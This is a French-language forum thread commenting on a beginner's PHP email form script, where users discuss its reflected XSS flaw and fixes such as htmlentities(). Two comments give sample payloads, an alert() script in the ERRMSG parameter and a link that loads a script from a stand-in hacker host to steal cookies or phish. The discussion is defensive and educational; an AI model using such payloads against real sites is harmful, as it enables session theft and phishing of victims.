Sujet Précédent Sujet Suivant

FORMULAIRE ENVOI PAR MAIL AVEC MESSAGE D'ERREUR

cs_GRenard Messages postés 1662 Date d'inscription lundi 16 septembre 2002 Statut Membre Dernière intervention 30 juillet 2008 - 22 juil. 2004 à 18:49
mickadevelop Messages postés 55 Date d'inscription mardi 15 février 2005 Statut Membre Dernière intervention 4 juin 2010 - 26 juin 2007 à 21:40
Cette discussion concerne un article du site. Pour la consulter dans son contexte d'origine, cliquez sur le lien ci-dessous.

https://codes-sources.commentcamarche.net/source/24784-formulaire-envoi-par-mail-avec-message-d-erreur
mickadevelop Messages postés 55 Date d'inscription mardi 15 février 2005 Statut Membre Dernière intervention 4 juin 2010
26 juin 2007 à 21:40
Ok je n'avais pas pensé a ce cas de figure. Merci et donc en conclusion il faut filtrer le html(avec htmlentites)toutes les variables demandé à l'utilisateur et que l'on affiche au format html!!!!!
winwarrior Messages postés 654 Date d'inscription jeudi 3 avril 2003 Statut Membre Dernière intervention 10 février 2009 1
26 juin 2007 à 19:30
Le hacker peut inciter une personne à cliquer sur un lien (social engineering)
(exemple: http://sitevulnerable.com/?variablePasSecurisée=<script src="http://siteduhacker.com/scriptMalveillant.js"></script>);
la victime en cliquant sur le lien (le hacker l'aura bien entendu camouflé) injectera dans sa propre page le code javascript du hacker
mickadevelop Messages postés 55 Date d'inscription mardi 15 février 2005 Statut Membre Dernière intervention 4 juin 2010
26 juin 2007 à 16:35
Oui je suis entierement d'accord avec toi qu'il ne faut pas laisser le javascript actif!! mais ce raisonnement n'a de valeur uniquement si un internaute malveillant mes un codes javascript sur une pages que d'autres interanutes peuvent consulter (par exemple dans un forum). Pour le cas qui est exposé au dessus on va afficher les variables saisies par l'utilisateur temporairement sur la page et il n'y aura uniquement que l'internaute qui les aura saisies qui sera concerné par ces variables. En conséquence si il rentre du javascript il ne pourra uniquement que lire ces propres cookies ou ce rediriger que lui meme vers une autre page web. Les conséquences ne seront valable uniquement que pour l'internaute qui a saisie les variable. Donnez moi votre avis sur ce raisonnement?
winwarrior Messages postés 654 Date d'inscription jeudi 3 avril 2003 Statut Membre Dernière intervention 10 février 2009 1
26 juin 2007 à 02:10
Combiné avec du social engineering (la victime devra cliquer sur le lien),
Un hacker pourrait mettre (par exemple) un code javascript qui lui enverrait le cookie de la victime sur ce domaine, ou ouvrirait une nouvelle fenetre avec une fausse identification ebay ou paypal (fishing) etc.. on peut presque tout faire en javascript
Donc non, ça ne sert pas à rien =)
mickadevelop Messages postés 55 Date d'inscription mardi 15 février 2005 Statut Membre Dernière intervention 4 juin 2010
25 juin 2007 à 23:36
salut, ca sert à rien de mettre htmlentities() puisque si il met des balises html elle ne seront actives que pour l'utilisateur (donc que pour le mec qui les met) si il a envi d'avoir des merdes sur ca page c'est sont probleme. J'aimerais avoir votre avis sur ce sujet peut etre n'ai- je pas pensé à une faille de securité lié à du javascripte ou autre merci :)
Mascotte_Alex Messages postés 20 Date d'inscription samedi 25 novembre 2006 Statut Membre Dernière intervention 22 juin 2007
7 avril 2007 à 23:18
Bonsoir, malheureusement les infos ne sont pas envoyées de mon coté
Sauriez vous pourquoi alors que j'ai bien modifier les infos concernant :
// Sujet du mail et adresse de déstination
$recipient = "dos-santos-alex@hotmail.fr";

Merci d'avance Bonne soirée
jonathan724 Messages postés 35 Date d'inscription dimanche 14 août 2005 Statut Membre Dernière intervention 4 juin 2007
22 févr. 2006 à 17:29
Bizard quand j' essaye d' accéder au fichier formulaire j' obtion le message suivant :
Parse error: parse error, unexpected T_IF in /home/goldfree/www/formulaire.php on line 17

si quelqu' un pourrait m' aider ! Merci
cs_gabi77 Messages postés 4 Date d'inscription dimanche 15 février 2004 Statut Membre Dernière intervention 11 avril 2006
30 juil. 2004 à 13:04
Bonjour

Le script est un début, je vais bientot le modifier d'après tous vos commentaire cela ma aidé a approfondir mais connaissance. Donc voila et merci à tous les commentaires ci-dessus.

Cordialement gabi77
cs_Anthomicro Messages postés 9433 Date d'inscription mardi 9 octobre 2001 Statut Membre Dernière intervention 13 avril 2007 8
23 juil. 2004 à 19:59
Salut ;-)

alternative à la gestion d'erreur via un switch : htmlentities() Comme ça les caractères html sont affichés et non interprétés par le navigateur.

Bye
cs_minta Messages postés 31 Date d'inscription samedi 1 février 2003 Statut Membre Dernière intervention 1 mai 2022
23 juil. 2004 à 16:18
Ce commentaire s'adresse à GRenard, j'aimerais recevoir ton commentaire sur la source que tu trouveras à l'adresse suivante:

<http://www.phpcs.com/code.aspx?ID=22503>
cs_chris81 Messages postés 589 Date d'inscription jeudi 2 octobre 2003 Statut Membre Dernière intervention 29 avril 2008 2
23 juil. 2004 à 07:24
salut,
sympa ton code par contre je crois qu'a un moment pour la gestion des champ vide tu ecrase ta reponse au fur et a mesure.
winwarrior Messages postés 654 Date d'inscription jeudi 3 avril 2003 Statut Membre Dernière intervention 10 février 2009 1
23 juil. 2004 à 00:04
Pas mal mais pas sécurisé, "formulaire.php?ERRMSG=<script>alert();</script>"
à ta place j'utiliserai "switch()" pour filtrer les erreur
"formulaire.php?ERRMSG=1" etc ..
Sinon, meme avis que GRenard pour les endif et le exit

Bonne continuation.
cs_GRenard Messages postés 1662 Date d'inscription lundi 16 septembre 2002 Statut Membre Dernière intervention 30 juillet 2008 1
22 juil. 2004 à 18:49
Pas mal pour un débutant par contre, c'est pas beau utiliser des endif :P mais bon tu fais comme tu veux

L'utilisation de ton exit à la fin de ton fichier result.php est a proscrire...
Même si sur les sites de php ils te disent de faire ca, ce n'est pas une bonne idée...
En plus, tu es à la fin de ton fichier, c'est completement inutile :P

Discussions similaires

Erreur d’exécution 424 : objet requis
luciol8 -
Marion8316 -

7 réponses
erreur d'execution 9
cs_getrare -
getrare -

7 réponses
Envoi de mail en TLS par Gandi, quelle fonction?
Billybobbonnet -
Billybobbonnet -

1 réponse
erreur d'execution '9'
cs_tracto -
tracto -

10 réponses
Erreur d'exécution '9' : l'indice n'appartient pas à la sélection
ptitemeuh -
ptitemeuh -

4 réponses
Rejoignez-nous